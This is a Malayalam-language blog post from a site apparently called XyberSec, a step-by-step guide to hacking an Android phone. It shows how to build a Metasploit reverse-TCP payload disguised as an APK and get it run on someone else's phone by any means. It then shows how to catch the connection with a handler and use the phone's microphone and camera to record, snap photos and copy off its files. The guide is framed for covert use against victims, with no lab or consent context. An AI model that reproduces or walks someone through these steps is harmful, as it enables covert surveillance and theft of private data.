.
XyberSec

XyberSec • Join Our Growing Community Of Kerala Hackers

ആന്‍ഡ്രോയിഡ് ഫോണ്‍ ഹാക്ക് ചെയ്യുന്നത് എങ്ങനെ ?

ഇപ്പോള്‍ സാധാരണമായി  ഉപയോഗിച്ചുവരുന്ന സ്മാര്‍ട്ട്‌ ഫോണുകളില്‍ ഭൂരിഭാഗവും ആന്‍ഡ്രോയിഡ് അടിസ്ഥാനമാക്കി ഉള്ളതാണ്. അതുകൊണ്ടുതന്നെ ഒരു ആന്‍ഡ്രോയിഡ് ഫോണ്‍ എങ്ങനെ ഹാക്ക് ചെയ്യാം എന്നത് നമ്മില്‍ പലരും അന്വേഷിചിട്ടുണ്ടാവും. ഒരു ആന്‍ഡ്രോയിഡ് ഫോണ്‍ എങ്ങനെ ഹാക്ക് ചെയ്യാം എന്നാണ് ഈ പോസ്റ്റിലുടെ ഞാന്‍ പറയുവാന്‍ പോകുന്നത്. ഇവിടെ ഞാന്‍ ഉപയോഗിക്കുന്നത് മെറ്റാസ്പ്ലോയിറ്റ് എന്ന ഒരു സോഫ്റ്റ്‌വെയര്‍ ആണ്. ഇതിനെപ്പറ്റി മുന്പ് വിശദമായി പോസ്റ്റ്‌ ചെയ്തിരുന്നു. ഇപ്പോള്‍ ഇതുപയോഗിച്ച് എങ്ങനെ ഒരു ആന്‍ഡ്രോയിഡ് ഫോണ്‍ ഹാക്ക് ചെയ്യാം എന്ന് കാണാം.

ഹാക്കിംഗ് രംഗത്ത്‌ സാധാരണമായി ഉപയോഗിച്ചുവരുന്ന റിവേര്‍സ് TCP (Reverse TCP) എന്ന രീതി അന്ന് ഞാന്‍ ഇവിടെ ഉപയോഗിക്കുന്നത്. അതായത്. നമ്മള്‍ മെറ്റാസ്പ്ലോയിറ്റ് ഉപയോഗിച്ച് ഒരു പേലോഡ് നിര്‍മിക്കുകയും അത്  മൊബൈല്‍ ഫോണില്‍ execute ചെയ്യുമ്പോള്‍ നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് ഒരു കണക്ഷന്‍ സൃഷ്ടിക്കപ്പെടുകയും ചെയ്യുന്നു. ഈ കണക്ഷന്‍ മുഖേന ആ ഫോണിലെ വിവരങ്ങള്‍ നമുക്ക് ലഭ്യമാകുകയും ചെയ്യുന്നു.

ഇനി ഇത് എങ്ങനെ ചെയ്യാം എന്ന് നോക്കാം.

ആദ്യം ലിനക്സില്‍ ഒരു ടെര്‍മിനല്‍ വിന്‍ഡോ തുറക്കുക. (അതിനായി  Ctrl+Alt+T എന്ന ഷോര്‍ട്ട് കട്ട് ഉപയോഗിച്ചാല്‍ മതിയാവും)
അതിനുശേഷം താഴെക്കാണുന്ന രീതിയില്‍ command ടൈപ്പ് ചെയ്യുക.

msfpayload android/meterpreter/reverse_tcp LHOST=<attacker ip adress>
 LPORT=<port number> R > hack.apk

ഇവിടെ attacker ip adress എന്ന ഭാഗത്ത്‌ നമ്മുടെ ഐ പി അഡ്രസ്സും, port number എന്ന ഭാഗത്ത് നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് കണക്ഷന്‍ വരേണ്ട പോര്‍ട്ടിന്റെ നമ്പറും കൊടുക്കുക. (ചിത്രം കാണുക)

ഇവിടെ എന്റെ ഐ പി അഡ്രെസ്സ് 192.168.8.94 ഉം പോര്‍ട്ട്‌ നമ്പര്‍ 443 ഉം ആണ്.
(നിങ്ങളുടെ ഐ പി അഡ്രെസ്സ് അറിയുവാനായി ലിനക്സ്‌ ടെര്‍മിനലില്‍ ifconfig എന്ന കമാന്‍ഡ് ഉപയോഗിച്ചാല്‍ മതി.)

ഇപ്പോള്‍ നിങ്ങളുടെ ഡസ്ക് ടോപ്പില്‍   hack.apk എന്ന ഒരു ഫയല്‍ കാണാം. ഇതാണ് നമ്മുടെ പേലോഡ് ഉള്ള ഫയല്‍. ഇത് നമുക്ക് ഹാക്ക് ചെയ്യേണ്ട ഫോണില്‍ റണ്‍ ചെയ്യണം. നേരിട്ടോ ഇന്റര്‍നെറ്റ്‌ വഴിയോ മറ്റെന്തെങ്കിലും മാര്‍ഗത്തിലൂടെയോ നമുക്ക് ഇത് ചെയ്യാം. ( അത് നിങ്ങളുടെ കഴിവ് പോലെ 😉 )

ഇനി അത് ഫോണില്‍ റണ്‍ ചെയ്യുമ്പോള്‍ നമ്മുടെ കംപ്യൂട്ടറിലേക്ക് വരുന്ന കണക്ഷനെ എങ്ങനെ കൈകാര്യം ചെയ്യാം എന്ന് നോക്കാം.
അതിനായി msfconsole തുറക്കുക. (ടെര്‍മിനലില്‍ അത് ടൈപ്പ് ചെയ്ത് എന്റര്‍ അമര്‍ത്തിയാല്‍ മതി)
ഇനി താഴെ കാണുന്ന കമാന്‍ഡ് ടൈപ്പ് ചെയ്യുക.

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

ഇനി മുന്പ് ചെയ്തതുപോലെ LHOSTഉം LPORTഉം സെറ്റ് ചെയ്യുക. (ചിത്രം കാണുക)

പിന്നെ കണക്ഷനുകള്‍ സ്വീകരിക്കാനായി exploit എന്ന കമാന്‍ഡ് കൂടി കൊടുക്കുക.
ഇപ്പോള്‍ മുന്പ് നമ്മള്‍ നല്‍കിയ പോര്ട്ടിലേക്ക് എന്തെങ്കിലും കണക്ഷനുകള്‍ വരുന്നുണ്ടോ എന്ന് കമ്പ്യൂട്ടര്‍ ശ്രദ്ധിക്കുകയായിരിക്കും.

ഈ സമയത്ത് നമ്മുടെ മുന്‍പത്തെ ആ apk ഫയല്‍ ഫോണില്‍ തുറക്കുക. അപ്പോള്‍ ഫോണില്‍ ഒരു വലിയ ബട്ടന്‍ കാണാം. അത് അമര്‍ത്തുക (അല്ലെങ്കില്‍ അമര്തിപ്പിക്കുക :p ) 

അപ്പോള്‍ നിങ്ങളുടെ സ്ക്രീനില്‍ ഇങ്ങനെ ചിലത് കാണാന്‍ കഴിയും (ചിത്രം കാണുക)

ഇപ്പോള്‍ ഫോണില്‍നിന്നുള്ള കണക്ഷന്‍ കമ്പ്യൂട്ടറില്‍ എത്തിക്കഴിഞ്ഞിരിക്കുന്നു.

ഇനി നമുക്ക് ആ ഫോണിനെ ചൂഷണം ചെയ്യാന്‍ ആരംഭിക്കാം :p

ഉദാഹരണങ്ങള്‍:

ആ ഫോണിന്റെ വിവരങ്ങള്‍ അറിയാന്‍ sysinfo എന്ന കമാന്‍ഡ് ഉപയോഗിക്കുക.

ഫോണിന്റെ മൈക്രോഫോണ്‍ ഉപയോഗിച്ച് ശബ്ദം റെക്കോര്‍ഡ്‌ ചെയ്യാന്‍ record_mic എന്ന കമാന്‍ഡ് ഉപയോഗിക്കാം.

ആ ഫോണിന്റെ ക്യാമറ ഉപയോഗിച്ച് ഫോട്ടോ എടുക്കുവാനായി webcam_snap 1 എന്ന കമാന്‍ഡ് ഉപയോഗിക്കാം. ഇനി മുന്‍പിലുള്ള ക്യാമറ ഉപയോഗിച്ചുള്ള ഫോട്ടോ ആണ് വേണ്ടത് എങ്കില്‍ webcam_snap 2 എന്ന് കൊടുത്താല്‍ മതി. ഫോട്ടോ ഡസ്ക്ടോപ്പില്‍ നോക്കിയാല്‍ കാണാം  (ചിത്രം കാണുക.)

ഇതുപയോഗിച്ച് ആ ഫോണിലെ ഫയലുകളും സോഫ്റ്റ്‌വെയറുകളും മറ്റു വിവരങ്ങളും നമുക്ക് കാണാന്‍ സാധിക്കും. അത് റൂട്ട് ചെയ്യാത്ത ഫോണ്‍ ആണെങ്കില്‍ ചില പരിമിതികള്‍ ഉണ്ടാവും എന്ന് മാത്രം.

ഇനി ആ ഫോണില്‍ നിന്ന് ഫയലുകള്‍ എങ്ങനെ അടിച്ചുമാറ്റാം എന്ന് നോക്കാം.

  • ls എന്ന കമാന്‍ഡ് ഉപയോഗിച്ചാല്‍ നിലവിലുള്ള ഫോള്‍ഡര്‍ ഇല്‍ ഉള്ള ഫയലുകളുടെ ലിസ്റ്റ് കാണാം.
  • cd എന്ന കമാന്‍ഡ് ഉപയോഗിച്ചാല്‍ മറ്റൊരു ഫോള്‍ഡര്‍ ലേക്ക് പോകാം. ഉദാ: cd /images/mohanlal
  • ഫയലുകള്‍ നമ്മുടെ കമ്പ്യൂട്ടറിലേക്ക് ഡൌണ്‍ലോഡ് ചെയ്യാന്‍ download filename എന്ന് കൊടുത്താല്‍ മതി. ഉദാ: download image.jpg
  • ഫോള്‍ഡര്‍ നിര്‍മിക്കാന്‍ mkdir എന്ന കമാന്‍ഡ് ഉപയോഗിക്കാം ഉദാ: mkdir sasi
  • ഫോണിലേക്ക് ഒരു ഫയല്‍ അപ്‌ലോഡ്‌ ചെയ്യാന്‍ upload കമാന്‍ഡ് ഉപയോഗിക്കാം. ഉദാ: upload video.mp4

ഈ പോസ്റ്റ്‌ നിങ്ങള്‍ക്ക് ഉപയോഗപ്രദമായി എന്ന് കരുതുന്നു. അഭിപ്രായങ്ങള്‍ താഴെ രേഖപ്പെടുത്തുക.

Enjoying these posts? Subscribe for more
Subscribe now

Subscribe to be notified of new content and support XyberSec! You'll be a part of the community helping keep this site independent and ad-free.

You've successfully subscribed to XyberSec
Great! Next, complete checkout for full access to XyberSec
Welcome back! You've successfully signed in
Success! Your account is fully activated, you now have access to all content.